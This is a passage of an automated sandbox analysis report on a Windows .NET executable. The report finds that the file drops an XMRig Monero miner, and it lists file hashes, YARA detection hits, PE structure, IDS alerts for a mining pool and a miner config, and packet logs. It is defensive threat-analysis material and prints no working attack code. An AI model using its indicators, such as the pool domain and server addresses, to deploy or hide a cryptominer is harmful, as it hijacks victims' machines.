SSDEEP:	768:E5XX0Iup9hpoBiRrt5x/GYL6VW9SXzV54O0b1BPLcn05XX0Iup9hpoBiRrt5x/G+:J+y/cZ+y/7
MD5:	C9A0CA26BB8B62F5BEEC0120E82EABCD
SHA1:	EDCC8E3DE9CE5403CBE5CC163906810BFFA40778
SHA-256:	B988CBE0A07FBC2C934EAF61D0DFB6806C0C9EBC46A1F648A2EBDACA9E5737EE
SHA-512:	62A662C34C2CA8439657D84138C013CC4369B81F691ACA70B0D962020D5BE07A8225FB10BF6731F0E5B06C450FA4DA5EB482DADC5330ECA1BAFAF9709A7541F4
Malicious:	false
Preview:	ElfChnk.7.......x.......7.......x............... .....s.....................................................................^..E....................j.......x...........D...=.......................................8.......................=...3..........................................Go......0n..f...h.......$o..?.......................(........o......M.......M...F....n...............................................n..............................................................................&...........Q...*......v.......U%v.U...........................................................................<.......T...-.!................@U%v.U........L....m..~....L...v....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l.......n.........................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e.......".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.245297483649947
Encrypted:	false
SSDEEP:	384:9s9hdhohUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYS:iBsFpkBixVjZeC
MD5:	17515571C935F8D566A697DD7E94C1F5
SHA1:	5D69F901714F35E026DFB183A08F0AD73FF8980F
SHA-256:	D17C0DF2ADBC16C5CF96FB42C3C9DF1819E5F0CB10050AD7DF9A093B2EAA3A5B
SHA-512:	2C523B36E0322A1398A075E6E107B5A0108C58E9DE8D65978857E21B2C0C21847EB42E6709A325E8FDFFC23F023C1BBDDAAFF365BA1AD92AD493CD878BF75B77
Malicious:	false
Preview:	ElfChnk.....................................x........q......................................................................C..q............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................F...............................................A...............**..H............^...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2039922160531502
Encrypted:	false
SSDEEP:	384:3hOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVrVqVyFVlVBVjO:3yjb/
MD5:	9539D63813AB2FA37589711D20A022BD
SHA1:	A63A2FB0761BED1AB1A4A6906FBCC7D075A0A925
SHA-256:	A9CDADCD30FD1A08273079252DCE155BDED03FA53D074F6E3F968BE6489C5CA0
SHA-512:	92D87938190687C94C2C6477D37819BEA0276D5A8E743C1A70F8FB117B423AE6ED02203976020D81F14832F2D92257E9A4F6BE19BE129D2CDE903C2B6D8149D2
Malicious:	false
Preview:	ElfChnk......... ............... ............5...7..>.W!.....................................................................Y.7................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v.......................&..............................................................*..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.332857846021571
Encrypted:	false
SSDEEP:	384:ehpBwBeabT6BwBwyk8BwB27BwBaBwBzBwBBBwBjBwBpBwBRBwBFBwBMBwBKBwB5N:elabJkBgQjf3JH
MD5:	881FFC9FBEFD8121E7796BF0687867F1
SHA1:	D9136AD53C6C89978170D6A976D1438C2EECABEB
SHA-256:	66B6CD85FFDEB8C99BF8A4D9543BF9364A82E61D827F2D9E5A7B8B1530C91A61
SHA-512:	ED747A84330E1F1C6052378D05B2C86BC2AC5137BD011DDF0622E7D730484B272F5BE62DD37034936BF7515BC404444F7A2647B1A31E439931A82AB7935FEDDF
Malicious:	false
Preview:	ElfChnk.............................................p........................................................................n.............................................=...........................................................................................................................f...............?...........................m...................M...F....................>...........................%..........&.......................&..........._ ..................................................**................F.s.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.41949008702695
Encrypted:	false
SSDEEP:	384:/hf9cUEGTUEEyUEKpUEcwUEA3UETmUEC1dUEt/UE9gUEOUEdUEbUEHUEqUElUEhI:/dFAWBt1zmPg1
MD5:	C989DB8987574DA88D9C3746DBB9F7BF
SHA1:	4527AA575F5AD2D06CDD6E688FE154FA418E555D
SHA-256:	DB72ABAE93FD206D5EF132CD8A181A604B7802DCCEED0EABD67B528F04FCA907
SHA-512:	A39FD94E80964D096E01CFC2B5045815F0332EA24BF5A8E1B26DA311CF6F2C95B168A4541354EEB024CE7484D90A2E0B9098B323425780945500BDD95E256857
Malicious:	false
Preview:	ElfChnk.........~...............~...............h...s}........................................................................`.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................^N..............................................................**................a0q.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	89744
Entropy (8bit):	4.3362461948169075
Encrypted:	false
SSDEEP:	1536:we7+Y+BElbke7+Y+BEllUEzOVZqYjjhQxzOOobOoYeT:y
MD5:	CEA62DC732ED3D0D5EE62A8469E2F2CE
SHA1:	6D715E273724994B51AD3B3CB0C5C4DC023ED159
SHA-256:	F36BFB7C39371ED8A62C03200A792C86FE49F533C9DF1F5B67C2AD2789137ED1
SHA-512:	153DEA6E7A3E650E4C3D2857DA8457A45D3F3EB42554A18988A52A646EB69A1ECB788F610A2A73EB55F8E890D181AC5C4118A66E8BB1720E0658734438B75D63
Malicious:	false
Preview:	ElfChnk.........!.......R.......r............d...f..9..?....................................................................Z;.u................P...s...h...............x...=...................................................N...............................................w.......2.......................+...................................Y...........).......M...P...:....................4......S:..)...............................................6........................................................"......**..x...S........x..U.........1...6.......1.....#\......Z.........A......M...s....j.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....R........A..............F=.................A....................................N................w............................................................A...............:...............h.........A..............F..................A......).......FN........s............................

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81480
Entropy (8bit):	4.443327034651282
Encrypted:	false
SSDEEP:	768:mopNonop5z4VtJG/D7F3ZVFY1Osonopub:9pOopeu/37op6
MD5:	C2DE5B16F44420C255A60485082C6A0F
SHA1:	092027578CCB633108BB378E7346EA588A7B4C1A
SHA-256:	253DB5668C1FA4F172DB62990CD39366C25FAAEF28356AC5E7DC6D470CE6FCFA
SHA-512:	0F921BA1103D5B3BB1B89FA667D193600F203E851816DB882EA6460D673096641F42222650B5D55F8CF518BB60CA58FC51027A6B4611186FCF1E2AE07AABE50C
Malicious:	false
Preview:	ElfChnk.................a.......l...........H.......!..,............................................................................................s...h...............2...=...................................................N...............................................w...............................C...................................U...........).......M...1...:...................................................................................................................a...........................**......g.........G.U.........1...........1.....#\......Z.........A......M...s....j.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....R........A..............F=.................A....................................N................w............................................................A...............:...............h.........A..............F..................A......).......FN........s............................

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	152616
Entropy (8bit):	3.1899593351145565
Encrypted:	false
SSDEEP:	1536:fK+V56tcQTNYl9C2TK+V56tcQTNYl9C2nK+V56tcQTNYl9C2vpoKUBVUQKkSc9Sc:G
MD5:	894400C8CA7607EE3C278420627DA85A
SHA1:	BE34102232768AA18FE3374AC57EBE2BEEB0FA45
SHA-256:	6106680744E3F73D6728C9205938FF6F3CDDECB4FEAA2531D3A8CF7DAA594507
SHA-512:	49D99BE0A8D225AF4C826AD7D980B278ED91863C7BCB9D911EEE1D1A5A8E80B69CBC1D44C2107BDCB80FB247D98815F2A922E8674436CAB6CA0A36591BC5876C
Malicious:	false
Preview:	ElfChnk.................y...................pj...s...jf.....................................................................................................................=..........................................................................................................................._...............8...........................f...................M...c...........................l...&...................................................................................................................**......y.........k.U..........G..&........G...7+R.C.....t........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Temp\jscseoeoqftm.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5536256
Entropy (8bit):	6.689058470432344
Encrypted:	false
SSDEEP:	98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
MD5:	8FA2F1BA9B9A7EA2B3C4DD627C627CEC
SHA1:	358E3800286E5D4C5662366AD7311BC5A51BA497
SHA-256:	78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
SHA-512:	74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\jscseoeoqftm.tmp, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................\|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.296017978112679
Encrypted:	false
SSDEEP:	6144:W41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+oy5mBMZJh1Vjc:H1/YCW2AoQ0Nij5wMHrVo
MD5:	D5B0F77EE2395DF2360A51FE8CCB0454
SHA1:	3FAEC068AD4B0CE56C5F7413A95952383C0B6176
SHA-256:	8F6C6F1A7EAD365F4EB96542DA3662FA863DD1E611B367D857B8893E5820A6F9
SHA-512:	201EB3A637CCE88B066E663474562B75C65B752A672845A9650D1F7F141ABE87884B445700EF8FFD01C32C85151B5E8C035F7191B359CA09FB6EB3A8C6086C0A
Malicious:	false
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.-E.U................................................................................................................................................................................................................................................................................................................................................=Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.552632611901318
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	zufmUwylvo.exe
File size:	266'752 bytes
MD5:	c526cb2c72a976831c06fc09991e20d8
SHA1:	b719c9c64a5368abf2671a0e8d6ef8902bdaf9aa
SHA256:	53ad8953df55fbe65065f3e94135a4596f6209f20947c0e3df949910ce6cbbc6
SHA512:	a9d97d89d01fb056515ba4e3bb8d9e1836adb468564979fddc654855aa8d74946f3e8a287bad95c81f1e33e36a66655735f2b849e920ef07664ee90bd32a338e
SSDEEP:	6144:xZuorQXqrFqkp4AsBIPO/BbyiL/5CVlKULZSvb:jAq7pwIBSRilKUL
TLSH:	CA441A2A3BE50808E0EE89FE999E5B77C654D1127801B753B75372B20D05AFCED4B0E6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C............"...0.............n'... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x44276e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9AEB43BA [Sun May 12 06:52:42 2052 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x42720	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x44000	0x5ae	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x46000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x40774	0x40800	a710abf6d7128ae3279495321dd9dbd5	False	0.44782203851744184	data	5.567050370118544	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x44000	0x5ae	0x600	d00b022c8db8809a6c714f9f6a9394cd	False	0.423828125	data	4.07561211898091	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x46000	0xc	0x200	0fd7bf495fecf199e3baed688870330c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x440a0	0x324	data			0.43407960199004975
RT_MANIFEST	0x443c4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-09T16:16:53.523168+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.10	55489	1.1.1.1	53	UDP
2024-10-09T16:16:55.646066+0200	2054247	ET MALWARE SilentCryptoMiner Agent Config Inbound	1	104.20.4.235	443	192.168.2.10	49983	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 16:15:56.815304995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:56.815349102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:56.815450907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:56.843338966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:56.843353987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.425806999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.425875902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.470773935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.470792055 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.471167088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.519109011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.799324989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.839421988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.928632975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.928754091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.928837061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.928874969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.928889036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.928947926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.928952932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.929055929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.929128885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.929147005 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.929164886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.929253101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.930011034 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.930155039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.930222034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.930228949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.930417061 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.930576086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.930582047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.933689117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.933777094 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:57.933785915 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:57.987859011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.016045094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016227007 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016304016 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016352892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.016360044 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016398907 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.016402960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016505003 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016560078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.016565084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016721010 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016799927 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.016804934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016887903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.016959906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.017014980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.017019987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.017055035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.017060995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.017868042 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.017939091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.017996073 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.018001080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018069029 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.018073082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018160105 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018232107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018234015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.018260002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018326044 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.018341064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018724918 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018783092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.018788099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018860102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018901110 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.018906116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.018987894 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.019102097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.019107103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.061475992 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.106914997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.106925011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.106976032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107000113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107008934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:15:58.107042074 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:15:58.107058048 CEST	443	49723	84.32.84.109	192.168.2.10
